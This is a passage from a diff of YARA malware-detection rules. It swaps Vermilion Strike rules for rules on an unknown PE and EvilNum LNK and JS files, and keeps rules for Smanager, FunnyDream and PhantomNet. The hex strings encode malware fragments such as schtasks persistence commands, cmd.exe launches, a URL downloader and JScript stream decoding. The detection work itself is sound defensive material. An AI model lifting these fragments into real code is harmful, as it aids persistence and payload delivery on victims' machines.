f6 0f 1f 40 00 0f 1f 84 00 00 00 00 00 } + $OP_Files1 = { 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 80 3d [3] 00 00 75 04 33 c9 eb 11 b9 [3] 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 51 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 } + $OP_Files2 = { 00 00 83 c4 04 83 78 18 10 72 05 8b 40 04 eb 03 83 c0 04 [3-9] 00 50 68 [3] 00 6a 00 6a 00 ff [1-5] 8b 95 c8 fe ff ff 83 fa 10 72 0c 8b 8d b4 fe ff ff } + $s1 = "D$t9D$ }J" fullword ascii + $s2 = "u#h`KN" fullword ascii + $s3 = { 6f 73 5f 77 69 6e 2e 63 3a 25 64 3a 20 28 25 6c 75 29 20 25 73 28 25 73 29 20 2d 20 25 73 } + $s4 = { 61 63 63 65 73 73 20 74 6f 20 25 73 2e 25 73 2e 25 73 20 69 73 20 70 72 6f 68 69 62 69 74 65 64 } + $s5 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 } + $s6 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a } condition: - uint16(0)==0x4b50 and filesize >20KB and all of ($s*) + uint16(0)==0x5a4d and filesize >600KB and 3 of ($s*) and $seq_db and $seq_createdb and all of ($OP_Files*) } -rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE { meta: - description = "Detect the windows version of the stager of Vermilion Strike implant" + description = "Detect unknown TA that focus russian people" author = "Arkbird_SOLG" - id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae" - date = "2021-09-14" - modified = "2021-09-16" - reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18" + id = "228e194c-84d9-562a-8811-326c5efeafae" + date = "2020-07-14" + modified = "2021-07-14" + reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc" - score = 50 - quality = 75 + logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71" + score = 75 + quality = 73 tags = "FILE" - hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc" - level = "experimental" - tlp = "White" - adversary = "Vermilion Strike" + hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524" + tlp = "white" + adversary = "-" strings: - $s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 } - $s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 } - $s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 } - $s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 } + $s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 } + $s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 } + $s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 } + $s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide + $s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 } + $s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 } condition: - uint16(0)==0x5A4D and filesize >30KB and 3 of them + uint16(0)==0x5a4d and filesize >8KB and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_ELF_Vermilion_Strike_Sep_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE { meta: - description = "Detect the ELF version of Vermilion Strike implant" + description = "Detect LNK file used by EvilNum group" author = "Arkbird_SOLG" - id = "bfc498b6-4d3d-5ae9-a360-d31f8cf6c5fc" - date = "2021-09-14" - modified = "2021-09-16" - reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_ELF_Vermilion_Strike_Sep_2021_1.yara#L1-L19" + id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90" + date = "2020-07-13" + modified = "2021-07-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "fe4bb6da7b29f1ae7c25a657d27f5e60ffa0e7d9f1f09a5a2331e4a80eb79481" - score = 50 + logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350" + score = 75 quality = 75 tags = "FILE" - hash1 = "294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc" - level = "experimental" - tlp = "White" - adversary = "Vermilion Strike" + hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554" + hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb" + hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3" + tlp = "white" + adversary = "EvilNum" strings: - $s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 } - $s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d } - $s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff } - $s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 } - $s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 } + $s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide + $s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide + $s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide + $s4 = "System32 (C:\\Windows)" fullword wide + $s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 } + $s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d } + $s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 } condition: - uint32(0)==0x464c457f and filesize >30KB and 4 of them + filesize >60KB and 6 of ($s*) } -rule ARKBIRD_SOLG_MAL_Beacon_Vermilion_Strike_Sep_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE { meta: - description = "Detect the windows version of the beacon of Vermilion Strike implant" + description = "Detect JS script used by EvilNum group" author = "Arkbird_SOLG" - id = "61bb0f02-0eb3-5abe-a2fc-65b94a9486f7" - date = "2021-09-14" - modified = "2021-09-16" - reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Beacon_Vermilion_Strike_Sep_2021_1.yara#L1-L20" + id = "08b410c4-4899-5280-9735-6b3017c7a813" + date = "2020-07-13" + modified = "2021-07-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "801d93fc250666a48fbdd504c8bacab74f0bf7f534a7301a20ad79df3b41750d" + logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68" score = 75 - quality = 75 + quality = 69 tags = "FILE" - hash1 = "c49631db0b2e41125ccade68a0fe7fb70939315f1c580510e40e5b30ead868f5" - hash2 = "07b815cee2b85a41820cd8157a68f35aa1ed0aa5f4093b8cb79a1d645a16273f" - hash3 = "7129434afc1fec276525acfeee5bb08923ccd9b32269638a54c7b452f5493492" - tlp = "White" - adversary = "Vermilion Strike" + hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72" + hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24" + hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679" + tlp = "white" + adversary = "EvilNum" strings: - $s1 = { 50 c7 03 01 00 00 00 e8 cc ?? 00 00 89 43 04 83 f8 ff 74 2c 8b 4d 08 6a 00 8d 44 24 0c 50 53 6a 08 6a 01 51 e8 91 ?? 00 00 85 c0 75 13 8b 44 24 08 66 83 78 08 01 6a 01 50 74 38 e8 80 ?? 00 00 8b 4e 10 2b 4e 0c b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 47 03 c2 3b f8 0f 8c 30 ff ff ff 53 ff 15 } - $s2 = { 8b 4c 24 1c 6a 00 6a 00 6a 00 6a 01 51 ff 15 5c a2 02 10 8b 55 0c 8b f0 56 6a 02 53 52 8b cf 89 74 24 34 e8 f0 fb ff ff 8b 45 0c 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 50 57 56 ff 15 50 a2 02 10 8b 4c 24 30 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 53 51 50 89 44 24 3c ff 15 64 a2 02 10 8b f8 89 7c 24 14 8d 49 00 8b b4 24 90 00 00 00 8b 5c 24 7c 8b c3 83 fe 10 73 04 8d 44 24 7c 8d 50 01 8d a4 24 00 00 00 00 8a 08 40 84 c9 75 f9 2b c2 8b cb 83 fe 10 73 04 8d 4c 24 7c 8b 55 20 52 8b 54 24 2c 52 50 51 57 ff 15 4c a2 02 10 85 } - $s3 = { 68 00 00 00 10 6a 00 6a 00 6a 00 6a 00 c7 44 24 60 01 00 00 00 ff 15 40 a2 02 10 8b d8 8d 54 24 2c 52 8d 44 24 3c 50 55 53 ff 15 38 a2 02 10 8b e8 85 db 74 07 53 ff 15 44 a2 02 10 85 ed 74 2f 8b } - $s4 = { 6a ff 68 [2] 02 10 64 a1 00 00 00 00 50 81 ec 14 01 00 00 a1 c0 72 03 10 33 c4 89 84 24 10 01 00 00 53 a1 c0 72 03 10 33 c4 50 8d 84 24 1c 01 00 00 64 a3 00 00 00 00 33 db 8d 44 24 0c 89 9c 24 24 01 00 00 50 8d 4c 24 18 89 5c 24 0c 51 89 74 24 18 c7 44 24 14 04 01 00 00 ff 15 04 a0 02 10 8d 44 24 14 c7 46 18 0f 00 00 00 89 5e 14 88 5e 04 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 8d 54 24 18 52 8b ce e8 [2] ff ff 89 9c 24 24 01 00 00 c7 44 24 08 01 00 00 00 e8 d1 fe ff ff 85 c0 8b c6 74 0e 6a 02 68 ?? c6 02 10 e8 [2] ff ff 8b c6 8b 8c 24 1c 01 00 00 64 89 0d 00 00 00 00 59 5b 8b 8c 24 } - $s5 = { a1 c0 72 03 10 33 c4 89 44 24 2c 68 00 00 00 f0 6a 18 6a 00 6a 00 68 4c 97 03 10 ff 15 30 a0 02 10 85 c0 75 11 33 c0 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 58 97 03 10 8b 0d 54 97 03 10 68 50 97 03 10 6a 00 33 c0 6a 00 66 89 44 24 1e a1 5c 97 03 10 89 54 24 2c 6a 1c 8d 54 24 20 89 44 24 34 a1 4c 97 03 10 89 4c 24 2c 8b 0d 60 97 03 10 52 50 c6 44 24 28 08 c6 44 24 29 02 c7 44 24 2c 0e 66 00 00 c7 44 24 30 10 00 00 00 89 4c 24 40 ff 15 2c a0 02 10 85 c0 74 87 8b 0d 50 97 03 10 56 8b 35 38 a0 02 10 6a 00 68 ?? 82 03 10 6a 01 51 c7 44 24 18 01 00 00 00 c7 44 24 20 01 00 00 00 ff d6 85 c0 74 2b a1 50 97 03 10 6a 00 8d 54 24 0c 52 6a 03 50 ff d6 85 c0 74 16 8b 15 50 97 03 10 6a 00 8d 4c 24 14 51 6a 04 52 ff d6 85 c0 75 12 33 c0 5e 8b 4c 24 2c 33 cc e8 [2] 00 00 83 c4 30 c3 8b 15 50 97 03 10 6a } + $s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b } + $s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b } + $s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 } + $s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 } + $s5 = { 7d 2c 20 ?? 20 3d 20 ?? 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 2c 20 31 20 2b 20 ?? 29 2c 20 ?? 20 3d 20 ?? 2e 73 6c 69 63 65 28 31 20 2b 20 ?? 20 2b 20 34 29 2c 20 ?? 20 3d 20 5b 5d 2c } + $s6 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 41 44 4f 44 42 2e 53 74 72 65 61 6d 22 29 3b } + $s7 = { 5b ?? 5d 20 3d 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 2d 22 20 2b 20 ?? 20 2b 20 22 54 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 20 2b 20 22 3a 22 20 2b 20 ?? 3b } condition: - uint16(0)==0x5A4D and filesize >30KB and 4 of ($s*) + filesize >8KB and 6 of ($s*) } rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE { @@ -195945,2825 +198067,2553 @@ rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE score = 75 quality = 61 tags = "FILE" - hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c" - - strings: - $s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 } - $s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 } - $s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 } - $s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 } - $s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c } - $s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 } - $s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c } - $s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c } - $s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii - $s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d } - $s11 = "&About VVSup..." fullword wide - $s12 = "%d.tmp" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize >90KB and 7 of them -} -rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE -{ - meta: - description = "Detect backdoor used by FunnyDream (November 2020)" - author = "Arkbird_SOLG" - id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6" - date = "2020-12-19" - modified = "2020-12-19" - reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22" - license_url = "N/A" - logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199" - score = 75 - quality = 67 - tags = "FILE" - hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529" - - strings: - $s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 } - $s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 } - $s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 } - $s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 } - $s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a } - $s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 } - $s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 } - $s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 } - $s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 } - $s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 } - - condition: - uint16(0)==0x5a4d and filesize >90KB and 6 of them -} -rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE -{ - meta: - description = "Detect PhantomNet (November 2020)" - author = "Arkbird_SOLG" - id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78" - date = "2020-12-19" - modified = "2020-12-19" - reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24" - license_url = "N/A" - logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a" - score = 75 - quality = 65 - tags = "FILE" - hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858" - hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056" - - strings: - $s1 = { 25 73 25 30 38 58 } - $s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 } - $s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 } - $s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 } - $s5 = "Proxy-Authorization: NTLM" fullword ascii - $s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a } - $s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 } - $s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c } - $s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 } - $s10 = { 48 6f 73 74 3a 20 } - $s11 = { 43 6f 6f 6b 69 65 73 3a 20 } - $s12 = "Proxy-Authenticate: NTLM" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize >90KB and 9 of them -} -rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE -{ - meta: - description = "Detect SkinnyBoy Dropper" - author = "Arkbird_SOLG" - id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56" - date = "2021-05-01" - modified = "2021-06-06" - reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" - source_url = 